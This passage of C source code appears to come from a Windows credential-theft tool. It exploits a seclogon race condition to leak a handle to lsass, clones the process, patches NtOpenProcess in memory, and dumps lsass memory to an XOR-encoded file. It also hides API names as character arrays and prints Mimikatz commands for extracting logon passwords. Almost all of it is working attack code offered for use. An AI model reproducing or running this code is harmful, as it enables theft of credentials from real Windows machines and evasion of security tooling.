(POBJECT_TYPE_INFORMATION_V2)OBJECT_TYPES_FIRST_ENTRY(ObjectTypes); 325 | for (ULONG i = 0; i < ObjectTypes->NumberOfTypes; i++) { 326 | if (RtlCompareUnicodeString(TypeName, &CurrentType->TypeName, TRUE) == 0) { 327 | *TypeIndex = i + 2; 328 | break; 329 | } 330 | CurrentType = (POBJECT_TYPE_INFORMATION_V2)OBJECT_TYPES_NEXT_ENTRY(CurrentType); 331 | } 332 | if (!*TypeIndex) 333 | Status = STATUS_NOT_FOUND; 334 | free(ObjectTypes); 335 | return Status; 336 | } 337 | 338 | 339 | void FindProcessHandlesInTargetProcess(DWORD targetPid, HANDLE* handlesToLeak, PDWORD handlesToLeakCount) 340 | { 341 | PSYSTEM_HANDLE_INFORMATION handleInfo = NULL; 342 | DWORD handleInfoSize = 0x10000; 343 | NTSTATUS status; 344 | ULONG processTypeIndex; 345 | UNICODE_STRING processTypeName = RTL_CONSTANT_STRING(L"Process"); 346 | status = GetTypeIndexByName(&processTypeName, &processTypeIndex); 347 | if (!NT_SUCCESS(status)) { 348 | printf("GetTypeIndexByName failed 0x%08x\n", status); 349 | exit(-1); 350 | } 351 | pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtQuerySystemInformation"); 352 | handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize); 353 | while ((status = NtQuerySystemInformation(SystemHandleInformation, handleInfo, handleInfoSize, NULL)) == STATUS_INFO_LENGTH_MISMATCH) 354 | handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2); 355 | for (DWORD i = 0; i < handleInfo->HandleCount; i++) { 356 | if (handleInfo->Handles[i].ObjectTypeIndex == processTypeIndex && handleInfo->Handles[i].UniqueProcessId == targetPid) { 357 | handlesToLeak[*handlesToLeakCount] = (HANDLE)handleInfo->Handles[i].HandleValue; 358 | *handlesToLeakCount = *handlesToLeakCount + 1; 359 | } 360 | } 361 | free(handleInfo); 362 | } 363 | 364 | void ReplaceNtOpenProcess(HANDLE leakedHandle, char* oldCode, int* oldCodeSize) { 365 | /* 366 | mov QWORD [rcx], 0xffff 367 | xor rax, rax 368 | ret 369 
| */ 370 | char replacedFunc[] = { 0x48, 0xC7, 0x01, 0xFF, 0xFF, 0x00, 0x00, 0x48, 0x31, 0xC0, 0xC3 }; 371 | DWORD oldProtection, oldProtection2; 372 | char* addrNtOpenProcess = (char*)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtOpenProcess"); 373 | // we save old code to restore the original function 374 | *oldCodeSize = sizeof(replacedFunc); 375 | memcpy(oldCode, addrNtOpenProcess, *oldCodeSize); 376 | memcpy((replacedFunc + 3), (WORD*)&leakedHandle, sizeof(WORD)); 377 | VirtualProtect(addrNtOpenProcess, sizeof(replacedFunc), PAGE_EXECUTE_READWRITE, &oldProtection); 378 | memcpy(addrNtOpenProcess, replacedFunc, sizeof(replacedFunc)); 379 | VirtualProtect(addrNtOpenProcess, sizeof(replacedFunc), oldProtection, &oldProtection2); 380 | } 381 | 382 | void RestoreNtOpenProcess(char* oldCode, int oldCodeSize) { 383 | DWORD oldProtection, oldProtection2; 384 | char* addrNtOpenProcess = (char*)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtOpenProcess"); 385 | VirtualProtect(addrNtOpenProcess, oldCodeSize, PAGE_EXECUTE_READWRITE, &oldProtection); 386 | memcpy(addrNtOpenProcess, oldCode, oldCodeSize); 387 | VirtualProtect(addrNtOpenProcess, oldCodeSize, oldProtection, &oldProtection2); 388 | } 389 | 390 | void EncryptAndWriteDumpToDisk(wchar_t* dumpPath, int xorKey) { 391 | HANDLE hDumpFileEncrypted; 392 | DWORD bytesRead, bytesWritten; 393 | char* readBuffer = gDumpBuffer; 394 | bytesRead = gBytesRead; 395 | for (DWORD i = 0; i < bytesRead; i++) 396 | readBuffer[i] = readBuffer[i] ^ (char)xorKey; 397 | 398 | hDumpFileEncrypted = CreateFile(dumpPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 399 | if (hDumpFileEncrypted == INVALID_HANDLE_VALUE) { 400 | printf("Cannot create file %S. 
Exiting...\n", dumpPath); 401 | exit(1); 402 | } 403 | WriteFile(hDumpFileEncrypted, readBuffer, bytesRead, &bytesWritten, NULL); 404 | CloseHandle(hDumpFileEncrypted); 405 | if (FileExists(dumpPath)) { 406 | unsigned char* add = (unsigned char*)malloc(163); 407 | unsigned char Success[95] = "EncodeData Check the path C:\\lsass.dmp.xor \nDecodeData DumpLsass.exe -t 2 -f lsass.dmp.xor -k "; 408 | memcpy(add, Success, sizeof(Success)); 409 | unsigned char key[4]; // 数字转字符串缓冲区 410 | sprintf(key, "%d", xorKey); // 将整数转换为字符串 411 | memcpy(add + sizeof(Success), key, 4); 412 | unsigned char mikz[64] = "\nsekurlsa::minidump lsass.dmp.xor \nsekurlsa::logonpasswords full"; 413 | memcpy(add + sizeof(Success) + 4, mikz, 64); 414 | DataProcess(add, sizeof(Success) + sizeof(mikz) + 4, 0); 415 | printf("EncodeData Check the path %S\n", dumpPath); 416 | printf("DecodeData DumpLsass.exe -t 2 -f tron.xor -k %d\n", xorKey, xorKey); 417 | } 418 | else 419 | printf("Something went wrong :(\n"); 420 | } 421 | 422 | void MalSeclogonDumpLsassWithSeclogonRaceCondition(int lsassPid, wchar_t* dumpPath, int xorKey) { 423 | PROCESS_INFORMATION procInfo; 424 | STARTUPINFO startInfo; 425 | DWORD originalPid, originalTid; 426 | char oldCode[15]; 427 | int oldCodeSize; 428 | HANDLE handles[8192]; 429 | DWORD handlesCount = 0; 430 | DWORD seclogonPid = 0; 431 | HANDLE hSeclogon, hDupedHandle, hLsassClone; 432 | NTSTATUS status; 433 | MINIDUMP_CALLBACK_INFORMATION callbackInfo; 434 | wchar_t dbgcoreStr[] = { L'd', L'b', L'g', L'c', L'o', L'r', L'e', L'.', L'd', L'l', L'l', 0x00, 0x00 }; 435 | wchar_t ntdllStr[] = { L'n', L't', L'd', L'l', L'l', L'.', L'd', L'l', L'l', 0x00, 0x00 }; 436 | char MiniDumpWriteDumpStr[] = { 'M', 'i', 'n', 'i', 'D', 'u', 'm', 'p', 'W', 'r', 'i', 't', 'e', 'D', 'u', 'm', 'p', 0x00 }; 437 | char NtCreateProcessExStr[] = { 'N', 't', 'C', 'r', 'e', 'a', 't', 'e', 'P', 'r', 'o', 'c', 'e', 's', 's', 'E', 'x', 0x00 }; 438 | pMiniDumpWriteDump MiniDumpWriteDumpDyn = 
(pMiniDumpWriteDump)GetProcAddress(LoadLibrary(dbgcoreStr), MiniDumpWriteDumpStr); 439 | pNtCreateProcessEx NtCreateProcessEx = (pNtCreateProcessEx)GetProcAddress(LoadLibrary(ntdllStr), NtCreateProcessExStr); 440 | EnableDebugPrivilege(TRUE); 441 | seclogonPid = GetPidUsingFilePath(L"C:\\WINDOWS\\system32\\seclogon.dll"); 442 | if (seclogonPid == 0) { 443 | printf("Seclogon service not running, trying to wake-up...\n"); 444 | RtlZeroMemory(&procInfo, sizeof(PROCESS_INFORMATION)); 445 | RtlZeroMemory(&startInfo, sizeof(STARTUPINFO)); 446 | CreateProcessWithTokenW(-1, 0, NULL, L"cmd", 0, NULL, NULL, &startInfo, &procInfo); 447 | // trying again to get the seclogon pid 448 | seclogonPid = GetPidUsingFilePath(L"C:\\WINDOWS\\system32\\seclogon.dll"); 449 | } 450 | SpoofPidTeb((DWORD)lsassPid, &originalPid, &originalTid); 451 | LeakLsassHandleInSeclogonWithRaceCondition((DWORD)lsassPid); 452 | RestoreOriginalPidTeb(originalPid, originalTid); 453 | FindProcessHandlesInTargetProcess(seclogonPid, handles, &handlesCount); 454 | if (handlesCount < 1) { 455 | printf("No process handles found in seclogon. 
The race condition didn't work.\n"); 456 | exit(-1); 457 | } 458 | if (FileExists(dumpPath)) DeleteFile(dumpPath); 459 | hSeclogon = OpenProcess(PROCESS_DUP_HANDLE, FALSE, seclogonPid); 460 | for (DWORD i = 0; i < handlesCount; i++) { 461 | DuplicateHandle(hSeclogon, handles[i], GetCurrentProcess(), &hDupedHandle, 0, FALSE, DUPLICATE_SAME_ACCESS); 462 | if (GetProcessId(hDupedHandle) == lsassPid) { 463 | status = NtCreateProcessEx(&hLsassClone, MAXIMUM_ALLOWED, NULL, hDupedHandle, 0x1001, NULL, NULL, NULL, FALSE); 464 | if (status != 0) { 465 | printf("NtCreateProcessEx failed with ntstatus 0x%08x", status); 466 | exit(-1); 467 | } 468 | // Set up minidump callback 469 | RtlZeroMemory(&callbackInfo, sizeof(MINIDUMP_CALLBACK_INFORMATION)); 470 | callbackInfo.CallbackRoutine = &MinidumpCallbackRoutine; 471 | callbackInfo.CallbackParam = NULL; 472 | // init global vars for storing dump in memory 473 | gDumpBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_LSASS_DMP_SIZE); 474 | gBytesRead = 0; 475 | // we ensure no one will close the handle, it seems RtlQueryProcessDebugInformation() called from MiniDumpWriteDump() try to close it 476 | SetHandleInformation(hLsassClone, HANDLE_FLAG_PROTECT_FROM_CLOSE, HANDLE_FLAG_PROTECT_FROM_CLOSE); 477 | // we need to patch NtOpenProcess because MiniDumpWriteDump() would open a new handle to lsass and we want to avoid that 478 | ReplaceNtOpenProcess((HANDLE)hLsassClone, oldCode, &oldCodeSize); 479 | 480 | BOOL result = MiniDumpWriteDumpDyn((HANDLE)hLsassClone, GetProcessId(hLsassClone), NULL, MiniDumpWithFullMemory, NULL, NULL, &callbackInfo); 481 | if (!result) { 482 | printf("MiniDumpWriteDump failed with error code %d\n", GetLastError()); 483 | exit(-1); 484 | } 485 | RestoreNtOpenProcess(oldCode, oldCodeSize); 486 | // unprotect the handle for close 487 | SetHandleInformation(hLsassClone, HANDLE_FLAG_PROTECT_FROM_CLOSE, 0); 488 | EncryptAndWriteDumpToDisk(dumpPath, xorKey); 489 | HeapFree(GetProcessHeap(), 0, 
gDumpBuffer); 490 | gDumpBuffer = NULL; 491 | CloseHandle(hLsassClone); 492 | break; 493 | } 494 | CloseHandle(hDupedHandle); 495 | } 496 | CloseHandle(hSeclogon); 497 | } 498 | 499 | DWORD WINAPI DumphashThread(LPVOID lpParam) { 500 | int xorKey = GenerateEvenRandomInt(20, 100); 501 | DWORD targetPid = GetPidUsingFilePath(L"C:\\Windows\\system32\\lsass.exe");; 502 | MalSeclogonDumpLsassWithSeclogonRaceCondition(targetPid, L"C:\\lsass.dmp.xor", xorKey); 503 | return 0; 504 | } 505 | int DumpHASH() { 506 | 507 | //MalSeclogonDumpLsassWithSeclogonRaceCondition(targetPid, encryptedDumpPath, xorKey); 508 | 509 | 510 | HANDLE myThread = CreateThread( 511 | NULL, // 默认线程安全性 512 | 0, // 默认堆栈大小 513 | DumphashThread, // 线程函数 514 | 0, // 传递给线程函数的参数 515 | 0, // 默认创建标志 516 | NULL); // 不存储线程ID 517 | 518 | if (myThread == NULL) { 519 | fprintf(stderr, "Failed to create thread. Error code: %lu\n", GetLastError()); 520 | return 1; 521 | } 522 | //WaitForSingleObject(myThread, INFINITE); 523 | 524 | // 关闭线程和事件句柄 525 | CloseHandle(myThread); 526 | 527 | } --------------------------------------------------------------------------------